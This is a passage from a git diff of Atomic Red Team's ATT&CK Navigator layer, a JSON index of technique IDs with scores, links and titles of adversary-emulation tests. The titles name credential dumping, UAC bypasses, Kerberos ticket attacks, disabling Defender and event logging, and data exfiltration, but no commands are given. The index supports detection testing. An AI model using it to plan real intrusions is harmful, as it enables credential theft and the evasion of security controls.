InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 1a1abbbf59..35163a6d68 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View 